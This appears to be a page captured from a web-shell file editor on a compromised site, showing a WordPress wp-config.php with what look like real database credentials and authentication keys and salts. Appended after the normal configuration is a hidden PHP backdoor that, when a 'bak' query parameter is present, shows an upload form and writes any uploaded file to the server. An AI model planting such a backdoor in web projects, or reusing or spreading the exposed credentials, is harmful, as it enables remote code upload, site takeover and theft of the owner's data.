Edit file File name : wp-config.php Content :<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'guideinstitutsbe_wp_pzyrn'); /** Database username */ define('DB_USER', 'guideinstitutsbe_wp_47liw'); /** Database password */ define('DB_PASSWORD', '*z%u981bHNXIXMY*'); /** Database hostname */ define('DB_HOST', 'localhost:3306'); /** Database charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'sCC3nc-S6|n3K6%f6X4-]4sFA87@fY_/oUv8#c7G0qSRh5lA7/7(m5NiDv(0h+r4'); define('SECURE_AUTH_KEY', ')*3X3a0)p+7(c1QM&x&;(RJF#LEm_z69)1!FJK8xqY54;(8umI(hIT3x1:#&V(au'); define('LOGGED_IN_KEY', 'qY9KG/[O-fW|2vgB80[li0aTq%qr[8DS5LU99-1p6AD+j_eLcpK+!ZDLx|ni8[K2'); define('NONCE_KEY', 'Dl%]lnPF07Mg-pQ1vH631@a]EQt(1z1cjSyqse-GM7(BOz%aqe3:Yn7:(XO7Vf]H'); define('AUTH_SALT', '4|@++(uP_PqoF#~4c:&AB-:(dc+!k6T4hOQ/Wi_33452i;uMKINa9lf34zh/S%m2'); define('SECURE_AUTH_SALT', '64+Se[30/aq|2P5NI890U6%DeYKC3fDocf/2pjZ/b3i6m04ku2[C#%9eb#*6!l#a'); define('LOGGED_IN_SALT', 'CAz94fV:Z7J2zv4!2z0l*FGo5qRHVs*5QY7pGu6RgzBx908wcfzhz0gc7w#y!36;'); define('NONCE_SALT', 'P2B*#fq5obxv9~q0%x#NI6JagbrQ8gNb&|83Q*fZ#d78cjBBkyo*pyHvxE#q%;ef'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = '4FhMXn3x_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'WP_CACHE_KEY_SALT', 'b05dbaa2885cfc50dc277526a9406a71' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?> Save